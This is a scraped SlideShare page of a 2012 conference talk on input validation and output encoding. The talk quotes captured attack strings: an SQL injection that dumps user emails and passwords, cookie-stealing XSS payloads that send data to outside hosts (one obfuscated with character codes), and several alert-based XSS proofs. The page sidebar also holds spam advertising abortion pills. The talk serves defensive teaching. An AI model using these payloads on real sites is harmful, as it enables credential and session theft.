Abusing JavaScript to Measure Web Performance
 
Rum for Breakfast
Rum for BreakfastRum for Breakfast
Rum for Breakfast
 
Analysing network characteristics with JavaScript
Analysing network characteristics with JavaScriptAnalysing network characteristics with JavaScript
Analysing network characteristics with JavaScript
 
A Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web TrafficA Node.JS bag of goodies for analyzing Web Traffic
A Node.JS bag of goodies for analyzing Web Traffic
 
Messing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristicsMessing with JavaScript and the DOM to measure network characteristics
Messing with JavaScript and the DOM to measure network characteristics
 
Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?Boomerang: How fast do users think your site is?
Boomerang: How fast do users think your site is?
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 

Recently uploaded (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 

Input sanitization

  • 1. Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
  • 2. IWYGWYETG ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
  • 3. $ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
  • 4. WARNING ! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
  • 5. How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
  • 6. < > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
  • 7. Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
  • 8. Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
  • 9. Let’s look at a few examples ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
  • 10. http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
  • 11. http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
  • 12. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
  • 13. <?php $id = htmlspecialchars($_GET[ ’id’ ]); ?> ... value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
  • 14. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 15. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 16. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  • 17. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
  • 18. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 19. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 20. use the quotes luke <a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?> > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  • 21. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 22. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 23. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62 ))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  • 24. The char codes translate to: <img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
  • 25. Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
  • 26. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 27. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 28. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 29. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 30. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 31. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES); ?> ... var host = "<?php echo $host ?>"; var div = document.getElementById("l"); div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  • 32. h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 33. h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 34. h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  • 35. Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
  • 36. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 37. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 38. Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  • 39. Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
  • 40. So what’s the common theme here? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
  • 41. Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
  • 42. They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
  • 43. Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
  • 44. Input Validation is a data quality issue ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
  • 45. Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
  • 46. Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
  • 47. But it always results in bad data ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
  • 48. Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
  • 49. regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
  • 50. Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
  • 51. I expected the regex to reject this text ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
  • 52. What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
  • 53. ;( ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
  • 54. Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
  • 55. <?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES); ?> <input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
  • 56. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 57. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’&#39;+alert(/xss/)+&#39;’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 58. <input type="text" value="&#39;+alert(/xss/)+&#39;" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  • 59. I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
  • 60. Questions? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
  • 61. Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44